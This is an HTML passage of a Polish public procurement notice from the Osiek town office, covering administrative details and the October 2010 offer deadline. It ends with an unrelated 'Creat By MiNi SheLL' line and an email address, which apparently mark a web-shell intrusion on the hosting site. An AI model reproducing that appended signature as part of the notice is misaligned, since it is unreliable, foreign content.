<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.osiek.iap.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w 0sieku
28-221 Osiek
ul. Rynek 1 
www.bip.osiek.iap.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 09:00, miejsce: Urząd Miasta i Gminy w 0sieku
28-221 Osiek
ul. Rynek 1 
pok.103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com